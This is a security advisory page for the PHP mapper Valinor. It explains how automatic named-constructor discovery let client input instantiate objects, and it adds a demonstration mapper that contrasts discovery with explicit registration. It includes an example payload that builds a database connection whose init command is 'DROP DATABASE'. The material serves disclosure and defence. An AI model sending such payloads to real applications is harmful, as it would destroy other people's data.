Ecosyste.ms: Advisories
Security Advisories: GSA_kwCzR0hTQS14aHI4LW1wd3EtMnJyMs03nw
Automatic named constructor discovery in Valinor
Design issue - automatic constructor discovery
The issue surfaced when upgrading an existing application from cuyz/valinor:0.3.0 to a newer version: the application broke because the wrong constructor was picked for a mapped class.
More importantly, the same behaviour is a security concern akin to the Rails mass-assignment issue (https://github.com/rails/rails/issues/5228): input supplied by the client decides which constructor runs and what objects get instantiated.
Example exploit
Take the following DTO example:
final class UserDTO
{
    public function __construct(
        public int $id,
        public string $name
    ) {}

    // Named constructor meant for application code: it needs a live PDO connection
    public static function fromDb(
        PDO $connection,
        int $id
    ): self { /* ... code to fetch the DTO here ... */ }
}
There is nothing inherently unsafe about the above UserDTO, but combined with cuyz/valinor:^0.5.0 (specifically the behaviour introduced in https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b) it is an explosive mix: the mapper sees that the payload keys match the parameters of fromDb(), picks that named constructor, and builds the PDO object from the nested input.
// this could be coming from user input:
$maliciousPayload = [
    'connection' => [
        'dsn' => 'mysql:host=some-host;database=some-database',
        'username' => 'root',
        'password' => 'root',
        'options' => [
            // PDO::MYSQL_ATTR_INIT_COMMAND === 1002
            1002 => 'DROP DATABASE all-the-moneys'
        ]
    ],
    'id' => 123,
];

$treeMapper->map(
    UserDTO::class,
    $maliciousPayload
); // your DB is gone :D
The above payload is written as a PHP array, but it could just as well arrive as JSON, an HTML form submission or application/x-www-form-urlencoded input.
Mitigation
Version 0.7.0 contains a patch for this issue.
Automatic named constructor resolution should be disabled - only explicitly mapped named constructors should be used/discovered.
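The two behaviours the advisory contrasts, shown side by side with a tiny reflection-based mapper. This is an added example and is not code from the advisory or from the Valinor project: TinyMapper is a deliberately simplified model of "discover" (any public static method returning self is a constructor candidate, the 0.5.0 to 0.6.0 behaviour) versus "explicit" (only __construct plus constructors registered by the caller, the 0.7.0 mitigation). DbConnection is a constructed stand-in for PDO so that nothing is actually opened; the payload is the advisory's, rebuilt inline.

```php
<?php
declare(strict_types=1);

// Stand-in for PDO (assumption for this example): records what a real driver
// would have sent to the server as MYSQL_ATTR_INIT_COMMAND (1002) on connect.
final class DbConnection
{
    /** @var list<string> */
    public array $initCommands = [];

    public function __construct(string $dsn, string $username, string $password, array $options = [])
    {
        foreach ($options as $attr => $value) {
            $this->initCommands[] = "$attr: $value";
        }
    }
}

final class UserDTO
{
    public function __construct(public int $id, public string $name) {}

    // Infrastructure-facing named constructor; must never be reachable from request input.
    public static function fromDb(DbConnection $connection, int $id): self
    {
        return new self($id, 'loaded via ' . count($connection->initCommands) . ' init command(s)');
    }
}

final class TinyMapper
{
    /** @var array<class-string, list<string>> named constructors explicitly allowed per class */
    private array $registered = [];

    public function __construct(private bool $discover) {}

    public function registerConstructor(string $class, string $method): self
    {
        $this->registered[$class][] = $method;
        return $this;
    }

    /** @return list<ReflectionMethod> constructors the mapper is allowed to call for this class */
    private function candidates(ReflectionClass $ref): array
    {
        $list = $ref->getConstructor() ? [$ref->getConstructor()] : [];
        foreach ($ref->getMethods(ReflectionMethod::IS_STATIC) as $m) {
            $type = $m->getReturnType();
            $returnsSelf = $type instanceof ReflectionNamedType
                && in_array($type->getName(), ['self', 'static', $ref->getName()], true);
            $allowed = $this->discover
                || in_array($m->getName(), $this->registered[$ref->getName()] ?? [], true);
            if ($m->isPublic() && $returnsSelf && $allowed) {
                $list[] = $m;
            }
        }
        return $list;
    }

    public function map(string $class, array $payload): object
    {
        $ref = new ReflectionClass($class);
        foreach ($this->candidates($ref) as $ctor) {
            $params = $ctor->getParameters();
            $names = array_map(fn(ReflectionParameter $p) => $p->getName(), $params);
            $required = array_map(
                fn(ReflectionParameter $p) => $p->getName(),
                array_filter($params, fn(ReflectionParameter $p) => !$p->isOptional())
            );
            // A candidate matches when every required parameter is present and no key is unknown.
            if (array_diff($required, array_keys($payload)) || array_diff(array_keys($payload), $names)) {
                continue;
            }
            $args = [];
            foreach ($params as $p) {
                if (!array_key_exists($p->getName(), $payload)) {
                    continue; // optional parameter, the default applies
                }
                $value = $payload[$p->getName()];
                $type = $p->getType();
                // Nested arrays are mapped into class-typed parameters: this recursion is
                // what turns attacker-controlled input into a live connection object.
                if ($type instanceof ReflectionNamedType && !$type->isBuiltin() && is_array($value)) {
                    $value = $this->map($type->getName(), $value);
                }
                $args[$p->getName()] = $value;
            }
            return $ctor->isConstructor() ? $ref->newInstanceArgs($args) : $ctor->invokeArgs(null, $args);
        }
        throw new InvalidArgumentException("No constructor of $class accepts keys: " . implode(', ', array_keys($payload)));
    }
}

// Constructed payload, identical in shape to the advisory's example.
$maliciousPayload = [
    'connection' => [
        'dsn' => 'mysql:host=some-host;database=some-database',
        'username' => 'root',
        'password' => 'root',
        'options' => [1002 => 'DROP DATABASE all-the-moneys'],
    ],
    'id' => 123,
];

$vulnerable = new TinyMapper(discover: true);
$user = $vulnerable->map(UserDTO::class, $maliciousPayload);
echo "discover mode: {$user->name}\n"; // fromDb() ran with an attacker-built connection

$fixed = new TinyMapper(discover: false); // fromDb() is never registered, so it is not a candidate
try {
    $fixed->map(UserDTO::class, $maliciousPayload);
} catch (InvalidArgumentException $e) {
    echo "explicit mode: {$e->getMessage()}\n";
}
$ok = $fixed->map(UserDTO::class, ['id' => 123, 'name' => 'alice']);
echo "explicit mode: mapped user {$ok->id} {$ok->name}\n";
```

The check that matters is in candidates(): in explicit mode a named constructor taking a class-typed parameter such as a connection is only callable if someone registered it on purpose, so the same payload that reached fromDb() under discovery now fails to match any constructor and is rejected before anything is instantiated. When auditing an application on an affected version, look for every mapped class with a public static method returning self whose parameters include a non-scalar type, since each one is a reachable object graph for the client.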
Permalink: https://github.com/advisories/GHSA-xhr8-mpwq-2rr2
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aHI4LW1wd3EtMnJyMs03nw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 2 years ago
Updated: over 1 year ago
Identifiers: GHSA-xhr8-mpwq-2rr2
References:
- https://github.com/CuyZ/Valinor/security/advisories/GHSA-xhr8-mpwq-2rr2
- https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b
- https://github.com/CuyZ/Valinor/releases/tag/0.7.0
- https://github.com/advisories/GHSA-xhr8-mpwq-2rr2
Blast Radius: 0.0
Affected Packages
packagist:cuyz/valinor
Dependent packages: 31
Dependent repositories: 21
Downloads: 957,735 total
Affected Version Ranges: >= 0.5.0, < 0.7.0
Fixed in: 0.7.0
All affected versions: 0.5.0, 0.6.0
All unaffected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.4.0, 0.7.0, 0.8.0, 0.9.0, 0.10.0, 0.11.0, 0.12.0, 0.13.0, 0.14.0, 0.15.0, 0.16.0, 0.17.0, 0.17.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1, 1.4.0, 1.5.0, 1.6.0, 1.6.1, 1.7.0, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.10.0, 1.11.0, 1.12.0